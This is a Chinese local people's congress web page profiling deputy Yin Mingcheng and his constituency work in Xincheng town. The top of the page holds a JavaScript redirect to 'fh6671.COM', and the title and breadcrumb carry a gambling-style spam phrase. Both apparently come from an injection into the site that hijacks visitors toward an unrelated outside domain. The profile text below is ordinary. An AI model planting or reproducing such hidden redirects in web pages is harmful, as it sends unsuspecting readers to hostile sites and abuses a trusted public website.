function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  代表风采  
平凡的岗位 不凡的业绩
——记市人大代表殷明成
来源: 本站      日期: 2020-03-20      作者:       点击数:

“民有所呼我有所应,只要是群众反映的、对全镇社会经济发展有利的,我就应该努力去解决、并用心解决好。”“心里装着的是老百姓心头事,手里干着的就是老百姓需求的实事。”这朴实的话语出自于一个在基层工作了20多年的老乡镇干部,一个在村头,在田间,在群众有需要时经常能看到的一个身材有些瘦弱的人。在人群中,他不起眼,但提起他的名字,说起他的工作,新城镇的老百姓都会不由自主的竖起大拇指。他,就是市十届人大代表、新城镇人大代表、新城镇人大主席殷明成。他用一件件平凡的小事,成就了不平凡业绩,履行了一名人大代表的职责!

勤学善思---

学习,是殷明成尽心履职的第一课。作为一名人大代表,他认真学习人民代表大会制度,宪法、地方组织法、代表法和相关法律、法规,为履职做好充分的准备;其次,学习如何审议各项报告、如何提出代表议案建议、如何参加闭会期间的活动等,将学习成果运用到不断提高自己的履职能力水平上。作为新城镇的人大主席,他还肩负着做好镇人大工作的职责,他总是在日常工作中,践行着以学为先的工作理念。在《宪法》2018年第五次修订后,为了给各村人大代表做好相关内容的培训,他先自己学习,梳理新旧宪法的变化,然后针对农民代表文化水平较低的现状,简化、提炼要点,制作成简洁、明了、易懂的课件,为各村人大代表们上了一堂堂能听懂、易掌握的新《宪法》培训课。

职尽责---

2017年3月,全面建设镇“人大代表之家”和全镇八个村“人大代表工作站”时,他认真按照市人大工作要求,首先更新、完善了“家、站”基础设施,对镇“人大代表之家”房屋改造40m2,配备电脑、打印机等设施设备,制作安装了制度牌、代表公示栏、意见建议办理结果公示栏、人大代表活动照片等。严格按照市人大“八有”标准,组织建设完成了8个村“人大代表工作站”,配备了办公桌椅、电脑、打印机、报刊架等设施设备,制作安装了制度牌、工作站成员信息公式栏、意见建议公示栏等46块。其次完善了“七个一”的配套体系,各工作站设站长一名,联络员一名,并结合镇村实际制定了代表学习制度、向选民述职制度、接待选民制度等。印发了《代表履职手册》、《人大代表接待选民群众登记册》等,既确保了硬件达标,又实现软件过硬,为全镇群众和人大代表架起了沟通联系的桥梁。

为充分发挥镇“人大代表之家”的阵地作用,定期开展活动。首先是开展好集中接待选民日活动。在每次开展集中接待选民时,他积极与在市里工作的市人大代表联系对接,确定接待时间、地点;活动中亲临现场,体察民情、了解民意,每次都认真聆听村民反映的诉求,详细记录问题成因,认真归纳整理,并在接待活动后立即梳理上报,及时为群众排解难题。

近年来结合镇经济发展任务和需求,他先后6次组织镇人大代表之家成员和各村工作人员赴陕西杨林、袁家村、马嵬驿,张掖市高台县、临泽县,敦煌市,金川市金川区等地就设施农业发展、乡村旅游建设、农村人居环境整治、农村基础设施完善、农村改厕工作推进、农业科技推广应用、农村合作社创建等方面进行考察学习,为促进全镇社会经济发展发挥了积极的引领推动作用。

心系群众---

殷明成认为想要得到群众的支持和信任,最重要的是要替老百姓分忧解难。

2017年初,观蒲村村民陈学珍因私自开荒与国家土地整理项目冲突,陈学珍因这一问题多年上访,甚至举牌子在主要路段展示,产生了极不好的影响。在人大代表接待选民活动时,殷明成对这一问题进行详细了解,随后他多次前往当事人家中,深入细致了解事情发生的经过。为了彻底解决此事,殷明成一次又一次的与陈学珍交谈,跟他讲法律、讲政策、摆道理,进行引导说服。经过多次努力,终于解开了陈学珍的心结,陈学珍心甘情愿地与村委会签订了土地承包合同,同时配合修建了300多米渠道、机耕路、过路桥等,使多年在市、区、镇挂号的重点防控上访人员问题得以彻底解决。

今年年初殷明成接到新城村村干部反映,新城村近400余亩耕地被市区排放的污水淹没,导致耕地无法按时耕种,并且水还在持续排泄中,流量较大。听到这一反映后,殷明成立马感觉到事情的严重性,马上就要春耕,村民的耕地被淹无法耕种是大事。如果此事处理不好,还可能引起群体性上访。事不宜迟,他立即下村了解情况。原来是市污水处理站排水浇灌新城村附近的林地,却因来水量过大淹没了新城村的耕地。了解清楚情况后殷明成立即上报上级有关部门,并与市建设局取得联系,协同住建局、环保局、自然资源局、市污水处理站等部门,最终在最短的时间内解决了此事,避免了一起群体性事件的发生,给村委会、村民一个满意的答复。

作为人大代表,收集民情民意是他必须履行的职责。他经常深入到农户家中和他们交谈,倾听他们的意愿和呼声,传达党和政府的声音。他高度重视接待选民和群众来信来电来访,事情无论大小,他都认真聆听,悉数记录在案。截止目前,共收集到的群众意见建议近100条,主要涉及农村人居环境建设、基础设施完善、设施农业发展、乡村旅游提升、村级卫生整治等涉及群众日常生活的方方面面。针这些问题,他始终认真对待,逐个深入了解,除个别历史遗留、情况复杂的问题外,其他的均给予了合理答复。

         殷明成,一名普普通通的人大代表,用他的行动践行了“人民选我当代表,我当代表为人民”的誓言。